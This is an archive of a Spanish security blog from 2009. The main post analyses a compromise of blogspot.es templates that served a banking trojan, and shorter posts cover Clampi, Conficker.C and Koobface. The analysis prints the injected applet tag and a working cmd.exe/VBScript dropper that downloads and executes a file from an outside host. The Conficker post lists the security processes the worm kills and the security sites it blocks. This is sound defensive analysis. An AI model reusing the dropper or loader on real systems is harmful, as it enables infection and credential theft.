Un lugar sin fin

malware

¡Comprometidos los blogs de blogspot.es!

Escrito por unlugarsinfin 20-10-2009 en General. Comentarios (0)

Ahora que los chicos de blogspot.es han solucionado el problema (durante la tarde del Lunes 19 de Octubre), puedo comentar esta noticia.

 

El pasado viernes 16 de octubre por la mañana, me encontré con una sorpresa al acceder a este mismo blog que estáis leyendo, a nuestro queridísimo blog http://unlugarsinfin.blogspot.es.

 

De repente, un mensaje me solicitaba confiar en la ejecución de un applet firmado por www.eternalcog.org. Evidentemente, no se trataba de ninguna funcionalidad nueva de nuestro servidor de hosting gratuito, pues el firmante se trataba, nada más y nada menos, de la Eterna Iglesia de Dios (toma ya, con la Iglesia hemos topado).

 

http://unlugarsinfin.blogspot.es/img/blogspotes_infeccion0.jpg 

 

Viendo el código fuente de la página, en seguida te percatabas de lo ocurrido...

 

En el apartado ‘Acerca de’ presente en la columna de la izquierda de nuestro blog, presente en todas las plantillas de blogspot.es y por tanto presente en todos los blogs de blogspot.es, nos encontramos con el siguiente código:

 

<div id="leftbar">

 

<div id="acerca">

<h3 class="acerca">

Un lugar sin fin

<applet height="1" width="1" archive="http://www.eternalcog.org/wtc/halloween07/flash.jar" code="FlashPlayer.class"/>

 

¡Se trataba pues de una infección mediante Java Applet (y VBScript) que afectaba a todos los blogs de blogspot.es!.

 

Para corroborarlo (bueno sí, y por curiosidad), decidí ahondar más en la infección.

 

Normalmente, en este tipo de infecciones, mediante la ejecución de un Applet en Java y un script en VBScript o Batch, es posible descargar y ejecutar un programa remoto en un pc tan sólo con un click. Basta decir que se confía en el applet que se intenta ejecutar.

 

Pues bien, en un entorno mega-virtual (sandbox) para pruebas y demás (tengo que quedar bien, claro ;-)) aceptamos confiar en el applet y observamos los resultados.

 

La primera impresión fue la siguiente:

 

http://unlugarsinfin.blogspot.es/img/blogspotes_infeccion1.jpg 

 

Efectivamente, el applet creaba un VBScript en la ruta de instalación de mi Firefox con el siguiente contenido:

 

Const adTypeBinary = 1 

Const adSaveCreateOverWrite = 2 

Dim BinaryStream 

Dim BinaryStream 

Set BinaryStream = CreateObject("ADODB.Stream") 

Dim BinaryStream 

Dim BinaryStream 

BinaryStream.Type = adTypeBinary 

Set BinaryStream = CreateObject("ADODB.Stream") 

BinaryStream.Open 

BinaryStream.Open 

BinaryStream.Write BinaryGetURL(Wscript.Arguments(0)) 

BinaryStream.Write BinaryGetURL(Wscript.Arguments(0)) 

BinaryStream.Open 

BinaryStream.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite 

Function BinaryGetURL(URL) 

Dim Http 

Set Http = CreateObject("WinHttp.WinHttpRequest.5.1") 

Http.Open "GET", URL, False 

Http.Send 

BinaryGetURL = Http.ResponseBody 

End Function 

Set shell = CreateObject("WScript.Shell") 

shell.Run "xxx.exe"

 

y, a través del mismo, intentaba descargar y ejecutar el siguiente fichero http://www.discounttart.co.uk/newsletter/adobe.jpg renombrado a ‘xxx.exe’.

 

 

Veámoslo más en detalle a través de los comandos y procesos que lanzaba el applet:

 

http://unlugarsinfin.blogspot.es/img/blogspotes_infeccion2.jpg 

 

Y a continuación, vemos las propiedades de uno de ellos:

 

http://unlugarsinfin.blogspot.es/img/blogspotes_infeccion3.jpg 

 

Lo tenemos. El comando que ejecutaba el applet es el siguiente:

 

cmd.exe /c echo Const adTypeBinary = 1 > poq.vbs & echo Const adSaveCreateOverWrite = 2 >> poq.vbs & echo Dim BinaryStream >> poq.vbs & echo Set BinaryStream = CreateObject("ADODB.Stream") >> poq.vbs & echo BinaryStream.Type = adTypeBinary >> poq.vbs & echo BinaryStream.Open >> poq.vbs & echo BinaryStream.Write BinaryGetURL(Wscript.Arguments(0)) >> poq.vbs & echo BinaryStream.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite >> poq.vbs & echo Function BinaryGetURL(URL) >> poq.vbs & echo Dim Http >> poq.vbs & echo Set Http = CreateObject("WinHttp.WinHttpRequest.5.1") >> poq.vbs & echo Http.Open "GET", URL, False >> poq.vbs & echo Http.Send >> poq.vbs & echo BinaryGetURL = Http.ResponseBody >> poq.vbs & echo End Function >> poq.vbs & echo Set shell = CreateObject("WScript.Shell") >> poq.vbs & echo shell.Run "xxx.exe" >> poq.vbs & start poq.vbs http://www.discounttart.co.uk/newsletter/adobe.jpg xxx.exe

 

A estas alturas, ya sabemos de que se trataba la infección: llamaba y ejecutaba un applet desde una web externa (al parecer también comprometida) y se descargaba y ejecutaba un fichero de otra:

 

http://unlugarsinfin.blogspot.es/img/blogspotes_infeccion4.jpg 

 

Pero ¿qué hace ese fichero adobe.jpg? ¿Qué tipo de malware conlleva?

 

Subimos el fichero adobe.jpg a Virustotal y salimos de dudas: se trata de un troyano que intenta robar información relacionada con las transacciones comerciales y bancarias del usuario infectado, el Trojan-Spy.Win32.Banker, que además y como podemos ver abajo, tiene un bajo índice de detecciones por la mayoría de motores de antivirus.

 

En resumen, hemos sido principales testigos de una infección que ha podido afectar y comprometer a miles de usuarios. Por mi parte, intenté avisar a los administradores de blogspot.es y, si bien han solucionado el problema, todavía no he recibido contestación alguna (ni creo que la reciba, con todo el lío que han tenido que tener).

 

Daré más datos siempre que reciba más información y la seguridad y ética me lo permitan ;-)

 

Análisis del archivo adobe.jpg recibido el 2009.10.19 15:08:42 (UTC)

Resultado: 7/40 (17.5%)

Motor antivirus

Versión

Última actualización

Resultado

a-squared

4.5.0.41

2009.10.19

Trojan-Spy.Win32.Banker.ARQ!IK

AhnLab-V3

5.0.0.2

2009.10.19

-

AntiVir

7.9.1.35

2009.10.19

-

Antiy-AVL

2.0.3.7

2009.10.19

-

Authentium

5.1.2.4

2009.10.19

-

Avast

4.8.1351.0

2009.10.18

-

AVG

8.5.0.420

2009.10.19

-

BitDefender

7.2

2009.10.19

Gen:Trojan.Heur.jm0@sTnLSqnib

CAT-QuickHeal

10.00

2009.10.18

-

ClamAV

0.94.1

2009.10.19

-

Comodo

2657

2009.10.19

-

DrWeb

5.0.0.12182

2009.10.19

-

eSafe

7.0.17.0

2009.10.19

-

eTrust-Vet

35.1.7074

2009.10.19

-

F-Prot

4.5.1.85

2009.10.18

-

F-Secure

9.0.15300.0

2009.10.16

Gen:Trojan.Heur.jm0@sTnLSqnib

Fortinet

3.120.0.0

2009.10.19

-

GData

19

2009.10.19

Gen:Trojan.Heur.jm0@sTnLSqnib

Ikarus

T3.1.1.72.0

2009.10.19

Trojan-Spy.Win32.Banker.ARQ

Jiangmin

11.0.800

2009.10.19

-

K7AntiVirus

7.10.874

2009.10.19

-

Kaspersky

7.0.0.125

2009.10.19

-

McAfee

5775

2009.10.18

-

McAfee+Artemis

5775

2009.10.18

-

McAfee-GW-Edition

6.8.5

2009.10.19

-

Microsoft

1.5101

2009.10.19

-

NOD32

4522

2009.10.19

-

Norman

6.03.02

2009.10.19

W32/Obfuscated.H2!genr

nProtect

2009.1.8.0

2009.10.19

-

Panda

10.0.2.2

2009.10.18

Suspicious file

Prevx

3.0

2009.10.19

-

Rising

21.52.04.00

2009.10.19

-

Sophos

4.46.0

2009.10.19

-

Sunbelt

3.2.1858.2

2009.10.18

-

Symantec

1.4.4.12

2009.10.19

-

TheHacker

6.5.0.2.047

2009.10.19

-

TrendMicro

8.950.0.1094

2009.10.19

-

VBA32

3.12.10.11

2009.10.18

-

ViRobot

2009.10.19.1993

2009.10.19

-

VirusBuster

4.6.5.0

2009.10.19

-

 

Información adicional

Tamano archivo: 147456 bytes

MD5...: 3afcb4180f095a4e173c31eae957865e

SHA1..: 501e9c3961f290f35ce67128c2b4e6b6486d3286

SHA256: 50da17057b780bc7b78a5d8588c55412b7ea4323bd5a0b264fb6e5552315ef16

ssdeep: 3072:tjNuE+Yj+LqwWh3aOxyrwG9XhVRG1uWB8xOU75xKsAd:tXOWh3aOxysG9Xh
VRG1uWB8xOU75xK

PEiD..: -

PEInfo: PE Structure information

( base data )
entrypointaddress.: 0x2698
timedatestamp.....: 0x4ada75b2 (Sun Oct 18 01:56:02 2009)
machinetype.......: 0x14c (I386)

( 3 sections )
name viradd virsiz rawdsiz ntrpy md5
.text 0x1000 0x1e824 0x1f000 5.71 987cd15991770991e1f15e7e73f63c3c
.data 0x20000 0x16e8 0x1000 0.00 620f0b67a91f7f74151bc5be745b7110
.rsrc 0x22000 0x2b5a 0x3000 4.18 2871f25d7b9eff57b91e38761a302c49

( 1 imports )
> MSVBVM60.DLL: __vbaVarTstGt, __vbaVarSub, __vbaStrI2, _CIcos, _adj_fptan, __vbaStrI4, __vbaVarMove, __vbaFreeVar, __vbaLenBstr, __vbaStrVarMove, __vbaPut3, __vbaFreeVarList, __vbaEnd, _adj_fdiv_m64, -, __vbaFreeObjList, -, -, __vbaStrErrVarCopy, _adj_fprem1, __vbaRecAnsiToUni, -, -, __vbaStrCat, -, __vbaLsetFixstr, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryVar, __vbaAryDestruct, -, __vbaExitProc, -, -, __vbaOnError, -, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, -, -, __vbaStrFixstr, -, __vbaFpR8, __vbaBoolVarNull, _CIsin, __vbaErase, -, -, -, -, __vbaChkstk, -, __vbaFileClose, EVENT_SINK_AddRef, -, __vbaGenerateBoundsError, -, __vbaStrCmp, __vbaVarTstEq, __vbaI2I4, DllFunctionCall, __vbaRedimPreserve, _adj_fpatan, __vbaFixstrConstruct, __vbaRedim, __vbaRecUniToAnsi, EVENT_SINK_Release, -, __vbaUI1I2, _CIsqrt, __vbaVarAnd, EVENT_SINK_QueryInterface, __vbaUI1I4, __vbaExceptHandler, -, -, __vbaStrToUnicode, __vbaPrintFile, _adj_fprem, _adj_fdivr_m64, -, -, -, __vbaFPException, __vbaInStrVar, -, __vbaUbound, __vbaStrVarVal, __vbaVarCat, __vbaI2Var, -, -, _CIlog, __vbaErrorOverflow, -, __vbaFileOpen, -, -, __vbaInStr, __vbaNew2, _adj_fdiv_m32i, -, _adj_fdivr_m32i, -, __vbaStrCopy, -, __vbaFreeStrList, -, _adj_fdivr_m32, _adj_fdiv_r, -, __vbaVarTstNe, __vbaI4Var, __vbaVarCmpEq, __vbaAryLock, __vbaVarAdd, __vbaVarDup, __vbaStrToAnsi, __vbaFpI2, __vbaFpI4, -, __vbaVarCopy, -, _CIatan, -, __vbaCastObj, __vbaAryCopy, __vbaStrMove, _allmul, _CItan, __vbaAryUnlock, __vbaUI1Var, __vbaFPInt, _CIexp, __vbaFreeObj, __vbaFreeStr, -

( 0 exports )

RDS...: NSRL Reference Data Set
-

pdfid.: -

trid..: Win32 Executable Microsoft Visual Basic 6 (86.2%)
Win32 Executable Generic (5.8%)
Win32 Dynamic Link Library (generic) (5.1%)
Generic Win/DOS Executable (1.3%)
DOS Executable Generic (1.3%)

sigcheck:
publisher....: sony
copyright....: n/a
product......: terra
description..: n/a
original name: jh.exe
internal name: jh
file version.: 2.00
comments.....: n/a
signers......: -
signing date.: -
verified.....: Unsigned

El tamaño no importa, ¿o sí? ;-)

Escrito por unlugarsinfin 07-09-2009 en General. Comentarios (0)

Dicen que las cosas pequeñas de la vida son las más importantes. Leyendo los premios concedidos por Kapersky a lo mejor del malware en 2007, llama la atención que el código malicioso de menor tamaño hace lo mismo que el de mayor tamaño: borrar en el disco.

 

Este pequeño malware, de tan sólo 9 bytes, no es otro que Trojan.DOS.DiskEraser.b, y su código en ensamblador puede obtenerse aquí.

 

Otro repositorio de código fuente malicioso, y quizás uno de los más famosos es http://www.totallygeek.com/vscdb/, y existen muchos más, ¿cuál es vuestro ‘bicho’ favorito?

 

 http://unlugarsinfin.blogspot.es/img/sandia.jpg

Clampi, diseñado para robar

Escrito por unlugarsinfin 25-08-2009 en General. Comentarios (0)

Se trata de Clampi, también llamado Ligats, Rscan o Ilomo, “el más profesional malware ladrón de datos que jamás haya visto”, declara Joe Stewart, director de investigación de malware en SecureWorks. “Sabemos de otros malwares muy sofisticados y que tienen un amplio margen de acción. Pero éste está teniendo un gran impacto en los usuarios”.

 

Clampi es un troyano que ha infectado en todo el mundo entre 100.000 y un millón de PC con Windows, “no tenemos un modo exacto de contabilizar los equipos afectados”, ha confesado, declarando que afecta a los nombres y contraseñas de usuarios de 4.500 páginas Web. Es un número asombroso, tal y como explica Stewart, quien confiesa haber identificado 1.400 de estas 4.500 páginas. “Es cierto que hay otros muchos troyanos bancarios, pero suelen tener como objetivo unas 20 o 30 webs”.

 

Los hackers introducen Clampi en los PC engañando a los usuarios para que abran un archivo que aparece adjunto en un mensaje de correo electrónico o bien utilizando un conjunto de herramientas de multiexplotación que intenta introducir código de ataque en diferentes vulnerabilidades de Windows (sysinternals psexec). Una vez introducidos en una máquina, el troyano monitoriza las sesiones Web del equipo y si el propietario del PC entra en una de estas 4.500 páginas, captura los nombres de usuarios, las contraseñas, los PIN o cualquier otra información personal utilizada para entrar en estas webs o para rellenar formularios.

 

Periódicamente, Clampi “llama a casa” para mandar la información obtenida a un servidor controlado por los hackers que entonces pasan a la acción y vacían las cuentas de los usuarios o compran bienes utilizando información robada de las tarjetas de crédito.

 

Clampi, además también puede ser utilizado por los atacantes como servidor Proxy para ‘anonimizar’ sus actividades cuando acceden a los sistemas con credenciales robadas.

 

Aunque éste es el modo en que suelen actuar la mayor parte de los malwares, Stewart ha declarado que Clampi es diferente, tanto por la evidente escala de sus operaciones, como también por las múltiples capas de encriptación y engaño que utilizan sus creadores para ocultar el código de ataque y hacerlo prácticamente imposible para que sea investigado o descubrir cómo funciona realmente.

Stewart comenzó a seguirle los pasos a Clampi en 2007, pero realmente ha llevado a cabo un análisis más exhaustivo a principios de este año. “El embalaje que utiliza Clampi es muy sofisticado y hace realmente muy difícil invertir la ingeniería. Es la pieza de malware más difícil que he visto jamás”. Los investigadores de seguridad
suelen invertir el malware, separándolo e intentando descifrar cómo funciona, durante sus investigaciones.

Están usando paquetes basados en máquinas virtuales, lo que les permite tomar código desde un conjunto de instrucciones de CPU virtuales, de ese modo, la siguiente vez que se empaqueta, es totalmente diferente. Por eso, no se puede analizar con herramientas convencionales, como un depurador. Es realmente difícil seguirle los pasos”.


 http://unlugarsinfin.blogspot.es/img/matroska.jpg

Este troyano también encripta el tráfico entre los sistemas pirateados y el servidor de la red, y lo hace utilizando múltiples métodos: el tráfico enviado por Campli al servidor de control es encriptado con blowfish (448-bit), utilizando una clave de sesión aleatoria que es enviada también al servidor utilizando encriptación RSA de 2048 bits. Pero no solo encripta el tráfico de comunicaciones de la red, sino también las líneas dentro del código de ataque. Clampi también utiliza otra táctica inusual para esconderse de los escáneres antivirus, sus módulos son almacenados encriptados en el registro de Windows.

Su depurada manera de operar también le separa de otros malware financieros. “No se dirige sólo a páginas de banca, sino a toda una variedad de páginas donde la gente introduce sus datos y que a ellos les sirve para robar dinero de algún modo”, explica Stewart. Entre las 1.400 páginas Web que él ha identificado, se encuentran desde portales de información militar a páginas de aseguradoras, funerarias, casinos on-line, redes de publicidad o de noticias. Los sitios están hospedados en 70 países diferentes. “Eso nos da a entender que se trata de una gran operación en el back end”.

Por eso, es imposible asegurar, aunque todas las pistas conducen hasta Rusia o algún país del Este, cuáles son las bases de la banda criminal que está desarrollando esta red. “Parece que hubiera un único grupo detrás de todo esto. No hemos visto los típicos foros encubiertos que tratan sobre ello, lo que también es una razón por la que hay tan poca cobertura sobre Clampi hasta ahora. El grupo es muy secreto”.


De hecho, Stewart tiene pocas esperanzas de llegar a atrapar a los criminales que están detrás de Clampi. Los servidores que utilizan para dirigir la red de PC robot no están hospedados por un servicio habitual, sino que están escondidos en PC de la red. “No creo que lleguemos a descubrir los servidores”, ha admitido Stewart.

A una víctima de este ataque le robaron cerca de 75.000 dólares, tal y como ha publicado el Washington Post. El cofundador de la compañía defraudada, Auto Parts, de Gainesville, Henry Slack, declaró al periódico que el malware le robó información de sus cuentas bancarias y luego movió el dinero a diferentes cuentas de todo Estados Unidos.

Lo cierto es que Clampi ha estado dentro del PC de Slack durante más de un año, hasta que los controladores de la red utilizaron la información robada para entrar en la cuenta bancaria de la compañía.

Un modo que tenemos los usuarios para bloquear a este troyano es realizar cualquier actividad financiera en PC aislados, que únicamente se utilicen para conectarse a páginas de bancos, aseguradoras y demás. Este consejo funciona, porque Clampi se extiende mejor en redes empresariales. Si consigue infectar a un PC dentro de una organización, utiliza una herramienta Windows realizada por Microsoft para copiar el troyano en todas las máquinas del dominio. “Clampi puede extenderse en las redes de Microsoft como si fuera un gusano”, concluye Stewart.

 

Fuentes:

http://www.secureworks.com/research/threats/clampi-trojan/

http://www.idg.es/pcworldtech/mostrarNoticia.asp?id=83768&seccion=actualidad

http://blog.trendmicro.com/all-your-info-are-belong-to-us/

 

Conficker.C: la tercera variante

Escrito por unlugarsinfin 23-03-2009 en General. Comentarios (0)

 

Esta obra de arte va camino de convertirse en una auténtica plaga y ya podemos dar por seguro que su nombre (también Downadup o Kido) será recordado durante los próximos años.

 

Esta tercera versión amenaza con activarse el próximo 1 de Abril, el famoso ‘april fool's day’ o día de los inocentes para nuestros vecinos anglosajones. Ese día, Conficker.C tratará de conectarse a una lista de 500 dominios de un conjunto de 50.000 candidatos. Recordemos que la versión anterior tenía sólo una lista de 32 dominios de 250, y fue fácilmente neutralizado con ingeniería inversa. ´

 http://unlugarsinfin.blogspot.es/img/conficker2.jpg

 

Está vez será mucho más complicado detener la infección, más aún si tenemos en cuenta que el código del gusano aparece aún más ofuscado y es más ‘agresivo’ ya que es capaz de defenderse.

Así, entre otras características, es capaz de esquivar la mayoría de los antivirus comerciales, apagar las actualizaciones automáticas de Microsoft, bloquear también las actualizaciones de los antivirus e incluso crear 'agujeros' en los servidores de seguridad para mejorar su comunicación con otros equipos infectados.

 

Se cree que uno de sus principales objetivos es crear una especie de gigantesca red P2P, por el que los equipos infectados pueden ser clientes y servidores, y pueden compartir archivos en ambos sentidos. Esto supone nuevas vías de infección.

 

Os dejo información interesante extraída de CA, comenzamos la cuenta atrás hacia el 1 de abril…

 

 

Description

Win32/Conficker.C is a worm capable of blocking security related websites, terminating system security services and downloading component files using time-based generated URLs.

Method of Infection

When executed, Win32/Conficker.C drops a copy of itself using a random filename in the %System% directory. It may also drop copies of itself in the following directories:

 

%Program Files%\Windows NT
%Program Files%\Windows Media Player
%Program Files%\Internet Explorer
%Program Files%\Movie Maker

 

For these and other dropped files, Win32/Conficker.C:

 

  • Sets Read Only, Hidden and System file attributes
  • Generates a file creation/access time-stamp based on that of "kernel32.dll"
  • Creates access control entries
  • Exclusively locks the file, thus restricting access and privileges

Note: %System% and %Program Files% are variable locations. The malware determines the locations of these folders by querying the operating system. The default installation location for the System directory for Windows 2000 and NT is C:\Winnt\System32; for 95,98 and ME is C:\Windows\System; for XP and Vista is C:\Windows\System32. A typical location for the Program Files folder would be C:\Program Files.

 

In order to automatically execute at each startup, it adds the registry entry below:

 

HKCU\Software\Microsoft\Windows\CurrentVersion\Run\<random string> = "rundll32.exe <worm executable>, <random string>"

 

Conficker also registers a service with a random name created by combining a word from this list: 

 

App
Audio
DM
ER
Event
help
Ias
Ir
Lanman
Net
Ntms
Ras
Remote
Sec
SR
Tapi
Trk
W32
win
Wmdm
Wmi
wsc
wuau
xml

 

with another word from this list:

 

access
agent
auto
logon
man
mgmt
mon
prov
serv
Server
Service
Srv
srv
svc
Svc
System
Time


The worm also derives a display name for the service by combining two words from the list below:

 

Audit
Backup
Boot
Browser
Center

Component
Config
Control
Discovery
Driver
Framework
Hardware
Helper
Image
Installer
Logon
Machine
Management
Manager
Microsoft
Monitor
Network
Notify
Policy
Power
Security
Shell
Storage
Support
System
Task
Time
Trusted
Universal
Update
Windows

 

For example, the worm may register a service with these registry entries:

 

HKLM\SYSTEM\CurrentControlSet\Services\IrSvc\DisplayName = "Component Task"
HKLM\SYSTEM\CurrentControlSet\Services\IrSvc\Type = 00000020
HKLM\SYSTEM\CurrentControlSet\Services\IrSvc\Start = 00000002
HKLM\SYSTEM\CurrentControlSet\Services\IrSvc\ErrorControl = 00000000
HKLM\SYSTEM\CurrentControlSet\Services\IrSvc\ImagePath = "%Root%\system32\svchost.exe -k netsvcs"
HKLM\SYSTEM\CurrentControlSet\Services\IrSvc\ObjectName = "LocalSystem"
HKLM\SYSTEM\CurrentControlSet\Services\IrSvc\Description = "<
randomly copied from an existing service with a Startup Type of 2 >"
HKLM\SYSTEM\CurrentControlSet\Services\IrSvc\Parameters\ServiceDll = "%System%\<
worm executable >"

 

 

Note: %Root% is a variable location. The malware determines the location of the current root drive by querying the operating system. A typical location for the root drive would be C:\.

 

Additionally, Win32/Conficker.C checks for and tries to inject code into any processes executed with the commandline parameters "svchost.exe -k NetworkService".

Payload

Modifies Registry / Lowers Security Settings

Win32/Conficker.C deletes the following registry entry to deactivate Windows Security Center notifications:

 

HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\ShellServiceObjects\{FD6905CE-952F-41F1-9A6F-135D9C6622CC}

 

It deletes the registry entry below to prevent the operating system from starting in Safe Mode:

 

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot

Additionally, Win32/Conficker.C deletes the below registry entry to prevent "Windows Defender" from executing on system start:

 

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Windows Defender

 

Deletes Restore Points

Conficker resets all system restore points and deletes any saved system restore points on the affected system.

 

Disables Services

Win32/Conficker.C looks for and disables the following services if running:

 

wscsvc - Security Center
WinDefend
Windows Defender (available in Vista)
wuauserv - Automatic Updates
BITS - Background Intelligent Transfer Service
ERSvc - Error Reporting Service
WerSvc - Windows Error Reporting Service (available in Vista)

 

 

Terminates Processes

Win32/Conficker.C terminates the following security-related processes in an attempt to prevent its removal from the system: 

 

autoruns
avenger
confick
downad
filemon
gmer
hotfix
kb890
kb958
kido
klwk
mbsa.
mrt.
mrtstub
ms08-06
procexp
procmon
regmon
scct_
sysclean
tcpview
unlocker
wireshark

 

Blocks Websites

Win32/Conficker.C hooks the following APIs to monitor and restrict access to security websites:

 

Query_Main
DnsQuery_W
DnsQuery_UTF8
DnsQuery_A
sendto

 

In its attempt to prevent access to security-related sites for information, help or software updates, the worm attempts to block running applications from accessing URLs containing any of the following strings:

avg.
avp.
bit9.
ca.
cert.
gmer.
kav.
llnw.
llnwd.
msdn.
msft.
nai.
sans.
vet.
agnitum
ahnlab
anti-
antivir
arcabit
avast
avgate
avira
bothunter
castlecops
ccollomb
centralcommand
clamav
comodo
computerassociates
conficker
cpsecure
cyber-ta
db networkassociates
defender
drweb
dslreports
emsisoft
esafe
eset
etrust
ewido
f-prot
f-secure
fortinet
free-av
freeav
gdata
grisoft
hackerwatch
hacksoft
hauri
ikarus
jotti
k7computing
kaspersky
malware
mcafee
microsoft
mirage
msftncsi
msmvps
mtc.sri
nod32
norman
norton
onecare
panda
pctools
prevx
ptsecurity
quickheal
removal
rising
rootkit
safety.live
securecomputing
secureworks
sophos
spamhaus
spyware
sunbelt
symantec
technet
threat
threatexpert
trendmicro
trojan
virscan
virus
wilderssecurity
windowsupdate

 

Downloads and Executes Arbitrary Files

If the current system date is on or after 1 April 2009, the worm attempts to access pre-computed domain names to either download an updated copy of itself or download other malware. Below is a list of URL extensions used for pre-computed/generated URLs:

 

vn
vc
us
tw
to
tn
tl
tj
tc
su
sk
sh
sg
sc
ru
ro
ps
pl
pk
pe
no
nl
nf
my
mw
mu
ms
mn
me
md
ly
lv
lu
li
lc
la
kz
kn
is
ir
in
im
ie
hu
ht
hn
hk
gy
gs
gr
gd
fr
fm
es
ec
dm
dk
dj
cz
cx
com.ve
com.uy
com.ua
com.tw
com.tt
com.tr
com.sv
com.py
com.pt
com.pr
com.pe
com.pa
com.ni
com.ng
com.mx
com.mt
com.lc
com.ki
com.jm
com.hn
com.gt
com.gl
com.gh
com.fj
com.do
com.co
com.bs
com.br
com.bo
com.ar
com.ai
com.ag
co.za
co.vi
co.uk
co.ug
co.nz
co.kr
co.ke
co.il
co.id
co.cr
cn
cl
ch
cd
ca
bz
bo
be
at
as
am
ag
ae
ac

 

Additional Information

So that only one copy of itself runs at a time, Conficker creates a mutex in the format "Global\%u-%u", where "%u" is a decimal number.

 

The worm accesses the following websites to test Internet connectivity:

 

ask.com
baidu.com
facebook.com
google.com
imageshack.us
rapidshare.com
w3.org
yahoo.com

 

 

Nueva variante del 'gusano social' Koobface

Escrito por unlugarsinfin 03-03-2009 en General. Comentarios (0)

TrendsLabs han advertido que una nueva variante del gusano Koobface está siendo enviado desde emails de diferentes redes sociales, como Facebook, MySpace y Bebo.

http://unlugarsinfin.blogspot.es/img/koobface0.jpg 
El mensaje aparentemente es un mensaje enviado por un amigo desde una de las redes sociales, y te invita a ver un vídeo, pero al hacer clic en el enlace te redirige a un sitio web muy parecido al de YouTube donde te animan a descargar una versión actualizada del plugin de Adobe Flash Player.

http://unlugarsinfin.blogspot.es/img/koobface.jpg 
El archivo descargado es en realidad un caballo de Troya detectado como WORM_KOOBFACE.AZ, y según informan se propaga a través de las redes sociales, Trends ha publicado el siguiente listado de redes sociales donde los ha detectado:

  • Facebook.com
  • Hi5.com
  • Friendster.com
  • Myyearbook.com
  • Myspace.com
  • Bebo.com
  • Tagged.com
  • Netlog.com
  • Fubar.com
  • LiveJournal.com

El gusano se conecta a un sitio utilizando las credenciales de acceso almacenada en las cookies, y a continuación envía los mensajes a los amigos de la víctima.

Visto en
New Variant of Koobface Worm Spreading on Facebook, by TrendsLabs.